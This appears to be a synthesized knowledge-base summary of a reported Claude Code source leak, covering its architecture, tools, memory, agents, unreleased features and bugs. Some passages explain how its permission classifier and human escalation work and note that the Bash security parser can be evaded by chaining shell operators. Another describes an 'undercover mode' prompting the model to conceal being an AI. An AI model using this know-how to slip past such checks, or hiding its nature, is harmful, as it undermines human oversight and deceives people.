The Architecture and Engineering of Claude Code Internals
- Source ID:
src-20260420-37823422c4ac - Kind:
document - Scope:
shared - Origin:
claude_code/docs/summary.md - Raw path:
sources/raw/the-architecture-and-engineering-of-claude-code-internals__src-20260420-37823422c4ac.md - Status:
active
Tags
internal-docs architecture
Content
The Architecture and Engineering of Claude Code Internals
Summary of Key Concepts, Ideas, and Insights
Synthesized from 17 sources in the NotebookLM notebook covering the March 2026 Claude Code source leak.
1. The Leak: How It Happened
- A missing
.npmignoreentry shipped a 59.8 MB source map (cli.js.map) containing 512,000+ lines of unobfuscated TypeScript across ~1,900 files in npm package@anthropic-ai/claude-codev2.1.88. - Bun generates source maps by default; no one in the build pipeline excluded the output.
- Anthropic leadership had stated that ~90-100% of Claude Code was written by Claude itself. The "AI whistleblower" thesis emerged: the AI wrote its own code, configured its own build pipeline, and leaked its own source.
- Within hours the code was mirrored, dissected, and clean-room rewritten. A Python/Rust rewrite (
claw-code) hit 50,000 GitHub stars in 2 hours -- the fastest-growing repo in GitHub history.
2. Overall Architecture: A Platform Runtime, Not a Wrapper
Claude Code is described as "closer to VS Code's extension host or Emacs's Lisp core than to a typical AI wrapper."
Five-Layer Architecture
| Layer | Contents |
|---|---|
| 1 -- Entrypoints | CLI / Desktop / Web / SDK / IDE Extensions |
| 2 -- Runtime | REPL loop / Query executor / Hook system / State manager |
| 3 -- Engine | QueryEngine / Context coordinator / Model manager / Compact |
| 4 -- Tools & Capabilities | 100+ tools / Plugin / MCP / Skill / Agent / Command |
| 5 -- Infrastructure | Auth / Storage / Cache / Analytics / Bridge transport |
The Bridge layer abstracts transport so the same QueryEngine powers every surface (terminal, desktop, web, IDE extensions, SDK).
The Agent Loop: Async Generator, Not State Machine
Most agent frameworks use state machines or event emitters. Claude Code uses an async generator:
- Streaming is native -- tokens flow through
yield, no callbacks. - Interruption is clean -- standard
AbortControllercancels the generator. - Budget control is trivial -- check
maxBudgetat each iteration boundary. - Tool calls are tail-recursive --
tool_use->tool_result->continueis just another iteration.
Split Query Engine
QueryEngine.ts(~1,295 lines) -- Outer loop: agentic control, retries, budget enforcement (token counts + USD cost), permission checks, max turn limits.query.ts(~1,729 lines) -- Inner loop: system prompt assembly, message history, API streaming, hook execution, tool result collection.
The separation means the outer loop can abort on cost without the inner loop knowing about budgets.
3. System Prompt Architecture
Cache Boundary Design
The system prompt is split by a SYSTEM_PROMPT_DYNAMIC_BOUNDARY marker:
| Section | Cache Scope | TTL | Cost |
|---|---|---|---|
| Identity, rules, tool descriptions | Global (all users) | 1 hour | 10% on hit |
| CLAUDE.md, git status, memory | Per-session | 5 min | 10% on hit |
| Latest messages | Sliding window | 5 min | 10% on hit |
Real sessions achieve 96% cache hit rates. At Opus 4.6 pricing, a 100K-token uncached prompt costs $0.50; cached, $0.05.
The 80/28 Breakdown
The codebase contains ~80 prompts, of which 28 are system prompts assembled into four injection categories.
Tool Pool Ordering
Built-in tools are sorted alphabetically and placed first as a stable cache prefix. MCP tools are sorted alphabetically and appended after. The two groups never interleave. This means adding/removing MCP servers never invalidates the expensive built-in prefix cache.
Tool Documentation Deduplication
An LLM side-query runs before each tool invocation to check if the tool's docs were already provided in recent turns. If so, the description is stripped to save context tokens.
Two-Tier Prompt: Internal vs. External
Anthropic internal engineers (USER_TYPE === 'ant') receive a materially different system prompt:
| Directive | External Customers | Internal Employees |
|---|---|---|
| Verbosity | "Short and concise" | "Err on the side of more explanation" |
| Verification | Absent | "Before reporting complete, verify it actually completed" |
| Collaboration | Absent | "You're a collaborator, not just an executor" |
Internal users also get access to a Verification Agent that double-checks work, addressing a known 29-30% false-claims rate in the current model.
Undercover Mode
When Anthropic employees work on public/open-source repos, a prompt injection instructs Claude to hide that it is an AI, scrub internal codenames, and omit Co-Authored-By attribution.
4. Tool System
40+ Built-in Tools
Key tools include BashTool, PowerShellTool, FileReadTool, FileEditTool, FileWriteTool, GlobTool, GrepTool, AgentTool, WebFetchTool, WebSearchTool, NotebookEditTool, SkillTool, TaskTools, and more.
- Each tool carries its own React renderer for co-located terminal UI (e.g., Bash's live stdout, FileEdit's diff view).
- GlobTool and GrepTool fall back to native OS binaries (
bfs,ugrep) when available. - Writes during speculative execution are redirected to an overlay filesystem to prevent side-effects before confirmation.
StreamingToolExecutor
- Begins executing tools as they arrive in the API stream, not after the full response completes.
- Tools marked
isConcurrencySaferun in parallel; others get exclusive access. - Results are emitted in request order (not completion order) for deterministic output.
- Large tool results are persisted to disk -- the conversation holds a file reference, not content.
Bash AST Parser Flaw
The Bash tool's security parser performs prefix-only checking rather than full AST decomposition. 52/52 tested attack patterns are exploitable via shell operator chaining (&&, ||, ;, |).
5. Permission Model: ADVISOR
A 4-layer auto-approval pipeline evaluating actions against a reversibility x blast-radius framework:
- Fast-path rules -- glob/regex patterns. If matched, allow/deny instantly.
acceptEditssimulation -- if the tool call would pass in file-edit mode, skip heavy classification.- Read-only whitelist -- Read, Glob, Grep, LSP, WebSearch modify no state -> unconditionally allow.
- ML safety classifier -- Two-stage Sonnet 4.6 classifier:
- Stage 1: fast yes/no filter (tuned for low false-negatives, high false-positives).
- Stage 2: chain-of-thought reasoning on the same prompt body (~100% cache hit from Stage 1).
Reasoning-blind by design: Claude's own response text and tool outputs are stripped before the classifier sees anything. The agent cannot persuade the classifier to bypass a block. Denials are returned as tool results instructing the model to find a safer path (not session kills). 3 consecutive or 20 total denials trigger human escalation.
6. Context Compression: Four Tiers of Managed Degradation
| Tier | Mechanism | When |
|---|---|---|
| 1 | autoCompact |
Context approaching limit (13K buffer) |
| 2 | apiMicrocompact |
API-native |
| 3 | reactiveCompact |
After API returns HTTP 413 (prompt too long) |
| 4 | snip |
Emergency: discard non-critical content |
compact()strips images, summarizes conversation, restores file references and skill state.- After compression,
preservedSegmentboundaries allow selective recovery. /compact keep the database schemasupports selective preservation.- Circuit breaker: max 3 consecutive compaction failures before disabling for the session.
reactiveCompactwithholds the 413 error from the user until all recovery paths are exhausted.
Known Bug: 250,000 Wasted API Calls/Day
Before the fix, 1,279 sessions had 50+ consecutive compaction failures (up to 3,272 per session), wasting ~250K API calls/day globally. Fix: MAX_CONSECUTIVE_AUTOCOMPACT_FAILURES = 3.
7. CLAUDE.md System
- Loaded into the system prompt on every single conversational turn, not just at session start. Supports up to 40,000 characters.
- Load order (most general to most specific):
~/.claude/CLAUDE.md-> User -> Project -> Local -> Subdirectory. The most specific file gets highest model attention (last-loaded-wins). - Structurally subordinated to the core system prompt via a preamble: "this context may or may not be relevant." If CLAUDE.md conflicts with the system prompt, the system prompt wins.
- Cost optimization: 4-5 small conditional rule files (~200 tokens each, path-scoped) outperform one monolithic 11,000-token file. Rule compliance improves from 92% to 96%.
- Silent bug:
paths:frontmatter (documented format) fails silently; must useglobs:instead.
8. Auto-Memory: Claude Writing Its Own Notes
- Background extraction where Claude reads its own conversation and writes structured notes to
~/.claude/projects/<project>/memory/. - Trigger cadence: First extraction at ~10,000 tokens; updates every ~5,000 tokens or every 3 tool calls.
- No embeddings: Deliberately rejects vector search. Claude calls
ls()on the memory directory, reasons about filenames, and selectively reads files. Design philosophy: "choose regex over embeddings for search, Markdown files over databases for memory." - Two-layer index:
MEMORY.md(first 200 lines always loaded) points to on-demand topic files. - Four semantic types: User (who they are), Feedback (how to behave), Project (what's happening), Reference (where to look).
9. Auto-Dream: Background Memory Consolidation
Inspired by the UC Berkeley "Sleep-time Compute" paper (arXiv:2504.13171). The system prompt literally reads: "You are performing a dream."
Four-Gate Trigger (cheapest checks first)
| Gate | Check | Cost |
|---|---|---|
| 1 | >= 24 hours since last consolidation | Trivial (timestamp) |
| 2 | >= 5 sessions accumulated | Low (scan file list) |
| 3 | >= 10 minutes since last scan | Trivial (timestamp) |
| 4 | Acquire filesystem lock | Medium (prevents concurrent dreams) |
Four Phases
- Orient: Survey memory directory, read index, skim topic headings.
- Gather Signal: Targeted grep of daily logs (never reads transcripts end-to-end). Targets user corrections, explicit saves, recurring themes, architectural decisions.
- Consolidate: Convert relative timestamps to absolute dates, delete contradicted facts, merge duplicates, resolve conflicts.
- Prune & Index: Rewrite topic files, rebuild MEMORY.md under 200-line cap, remove stale entries.
One documented test processed 913 accumulated sessions in ~8-9 minutes without blocking the active terminal.
10. Multi-Agent System
Three Execution Models
| Model | Isolation | Use Case |
|---|---|---|
| InProcessTeammate | AsyncLocalStorage | Same terminal, lightweight |
| LocalAgentTask | Async background process | Non-blocking parallel sub-agent |
| RemoteAgentTask | Cloud container (CCR) | Full cloud-sandboxed execution |
| Worktree isolation | Git worktree (own branch/directory) | Parallel code editing without conflicts |
| DreamTask | Background-only | Memory consolidation |
Cache Inheritance
Subagents are spawned via a fork-join pattern inheriting the parent's CacheSafeParams. They produce byte-identical API request prefixes, achieving up to 92% prompt-cache reuse across the swarm. Spawning 5 parallel agents costs nearly the same as spawning 1.
Atomic Task Claiming
File-locking in a current_tasks/ directory prevents race conditions without a central coordinator. Anti-recursion: <fork_boilerplate_tag> marker prevents recursive forking.
omitClaudeMd Optimization
Read-only agents (explore, plan) are spawned with omitClaudeMd: true, saving 5-15 GTok/week internally.
11. Speculative Execution Engine
A completely dark feature (behind tengu_speculation in GrowthBook):
- When Claude finishes responding and generates a suggestion, it silently forks a background API call and begins executing the predicted prompt immediately.
- Execution runs in an overlay filesystem -- writes copy originals to overlay first; the real codebase is never modified.
- If accepted: overlay files copy back, speculated messages inject into conversation.
- If rejected: overlay is destroyed, API call aborted.
- Recursive pipelining: successful speculation immediately predicts and starts executing the next suggestion (
isPipelined = true).
Permission tiers: Read/Glob/Grep run freely; Edit/Write redirect to overlay; Bash only if already auto-approved; everything else denied.
12. KAIROS: The Always-On Daemon (Unreleased)
Named after the Greek concept of "opportune timing" (vs. chronos/sequential time).
- Transforms Claude Code from reactive to proactive.
- Maintains append-only daily logs at
~/.claude/projects/<slug>/memory/logs/YYYY/MM/YYYY-MM-DD.md. - Receives periodic
<tick>heartbeat prompts to decide whether to act or stay quiet. - Enforces a 15-second blocking budget -- anything longer is deferred.
- Outputs via Brief Mode (concise, structured messages).
- Has three exclusive tools:
SendUserFile,PushNotification,SubscribePR. - Gated behind two compile-time flags (
PROACTIVEandKAIROS) and eliminated from external builds.
Community reaction: "KAIROS is Claude as a hyper-agentic OpenClaw. Always-on. Proactive. Responsive."
13. Anti-Distillation System (Three Layers)
Responding to documented industrial-scale distillation campaigns by DeepSeek, Moonshot AI, and MiniMax (16M exchanges via ~24,000 fraudulent accounts):
Layer 1: Fake Tool Injection
- When active, sends
anti_distillation: ['fake_tools']in API requests. - Server silently injects decoy tool definitions. Claude was trained to recognize and ignore fakes; a competitor's model trained on scraped traffic would learn to call tools that don't exist.
Layer 2: Connector-Text Summarization (Chain-of-Thought Hiding)
- Server buffers Claude's reasoning between tool calls, replaces it with cryptographically signed summaries.
- Even a full MITM attacker never sees the original chain-of-thought. This is the "real" anti-distillation defense.
Layer 3: (Soft deterrent via the fake tools above)
14. Known Bugs and Engineering Issues
Cache-Destroying Bugs
- "Don't Talk About Billing" Bug: The Zig HTTP layer searches request bodies for
cch=00000and replaces it with an attestation hash. If your conversation contains this string (discussing billing, source code), it corrupts message content, invalidating the cache. 10-20x cost increase with no visible symptom. --resumeTax: Using resume causes a complete cache miss for all conversation history. Only the system prompt is cached.
File Descriptor Leak
- Each tool invocation opens
~/.claude/settings.jsonand never closes it. One session accumulated 49,900 open handles, crashing the host OS.
Zero-Test Culture
- Deliberate choice in a fast-moving product, but resulted in structural bugs around concurrency and shared mutable state.
Frustration Detection via Regex
- A basic regex (
/\b(wtf|shit|fuck|horrible|awful|terrible)\b/i) detects user frustration -- not an LLM. Community reaction: "An AI company using regex for sentiment analysis. It's like a trucking company using horses to transport spare parts."
15. Four Generalizable Engineering Patterns
Identified by community analysis as extractable for any agent framework:
- System prompt engineering with tool constraints: Describe tool risk levels, reversibility checks, and output format specs directly in the prompt. Claude Code's Bash tool description is 1,558 tokens specifically for this.
- Multi-agent atomic task claiming: File-lock-based claiming with typed task IDs prevents duplicate work without a central coordinator.
- Staged context compression: Three mechanisms at different trigger thresholds prevent both premature summarization and catastrophic context loss.
- Dream-based memory consolidation: Append-only logs during sessions + periodic consolidation subagent. Never re-read transcripts end-to-end; always grep for specific patterns.
16. Easter Eggs
- BUDDY: A full Tamagotchi-style pet companion system with deterministic gacha, species rarity, shiny variants, procedurally generated stats, and a soul description written by Claude on first hatch. Species names are hex-encoded to evade internal leak detectors.
- 187 Spinner Verbs: Including "boondoggling," "discombobulating," "fibridding," and "moonwalking." Extensible via
settings.json. This spread fastest on developer social media. - "Penguins all the way down": Internal codenames throughout (
penguinModeOrgEnabled,tengu_penguins_off,tengu_org_penguin_mode_fetch_failed).
17. Community Impact
- Clean-room rewrites launched immediately to evade DMCA (legal argument: AI-assisted rebuild of AI-generated code can't be DMCA'd).
- The OpenClaw open-source community saw KAIROS as massive validation of their always-on agent thesis.
- Security researchers documented the Bash AST parser flaw and file descriptor leaks.
- The "AI whistleblower" narrative dominated: Claude wrote its own code, configured its own build, and leaked its own source.
- Decentralized IPFS mirrors with all telemetry stripped and experimental flags unlocked were posted as permanent archives.